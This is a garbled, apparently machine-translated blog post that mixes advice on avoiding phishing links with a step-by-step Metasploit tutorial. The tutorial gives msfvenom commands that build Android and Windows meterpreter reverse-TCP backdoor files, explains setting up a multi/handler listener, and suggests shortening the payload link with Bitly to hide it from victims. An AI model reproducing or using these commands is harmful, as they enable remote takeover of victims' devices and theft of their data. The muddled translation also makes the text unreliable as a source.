hack android mobile by sending link - hack android using metasploit linux - live hack mobile phone|metasploit| msfconsole|msfvenom|
how to avoid links
Friends, nowadays people's mobile is accessed remotely by making a link, such a message is given by the hacker that you have got a lottery here or nowadays you have got a bonus of so many thousand on phone pay or Pentium and the link below is given to you. I open that link and then after some time it comes to know that your account has been cleared, then friends, first of all, look at the link which sends you carefully to see how that link is
survival mode
1- Some links are made by shortening on bitly and otherwise some links are http ones, I will recommend you that no matter what link you come, do not open it if someone unknown also sends some such foolish people There are those who send fake links to others, now you should know that your boss does not give you money without hard work, then why would he give the message sent to you for free? And you have an Android mobile, then you will be in Sikar by mistake, so the easiest way is that if you are not that skilled in avoiding cyber, then you take a small mobile in which the internet does not work, then take a plain mobile if you speak in the language of the village. And put your mobile number in which OTP comes and run it.
2- Nowadays some other websites are coming in which it is written that register on it and get mobile or laptop and share it to 10 people friends, no such offer comes, but when you fill that registration form then your All the details are saved with him and then he creates his database and sells it, you will see that calls start coming to you with your name and sometimes in the name of the bank or sometimes the loan person. He is convinced that it is telling my name, address and mobile number, email, it means that he is the right person and then you fall into his trap, while you do not notice that I have by mistake 3 months or 4 months from today Earlier some form was filled in the greed of getting laptop. If you sell your same database to an insurer, they come tomorrow.
how hackers make links
Hacker's most favorite framework is metasplite, in this they use exploit and use IP address and port of their system, how to do it step by step, I tell you here that you use it only for information. Not for hacking mobile otherwise you will be jailed
Use of Payload
Use of paylod
msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.43.253 lport=4444 -o test.apk
msfconsole And by pressing enter, the interface of Metasplite will open, which is used to act as an analyzer in the payload, that is, the file that has been created, it makes a link between the system or in a way it says that to tell that file. I am your master and you will work on my own advice, if not someone else, then to establish the link, open the metasplight framework, then use the exploit / multihandler, as soon as we use this exploit, then we load it Have to set and payload will be the same as we have used for our output file, as soon as payload is set, then local host and local port have to be set, after that all options have to be checkedAnd when everything is correct then execute the command exploit multihandler
Listening will start as soon as someone downloads our output file and clicks it, it will run and now the hacker continues to enter the backdoor in the system and the information keeps coming out of the system by giving different commands in his terminal Information from the victim's system removes
Then as soon as your link is ready, it will be shortened to your link by going to Bitly's website and another link will be received.
mobile hack from android app
Now let's talk about backdoor entry, that is, in this way the hacker enters the victim's system. Take control of that system by taking it in hand. For backdoor, .exe file which is run in computer and .apk file is run in mobile and with the help of this software, sends all information of that system to payload. is needed
msfvenom is used for payload, there are many payloads inside it which have different work here I will tell about only 2 payloads.
1- windows/ meterpreter/reverse_tcp used for computer
2- android/meterpreter/reverse_tcp used for Android mobile
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.43.253 lport=4444 -o test.exe
For mobile
I hope you liked this information, then share it with your relatives and friends so that they do not fall into the trap of these fraudsters.
0 Comments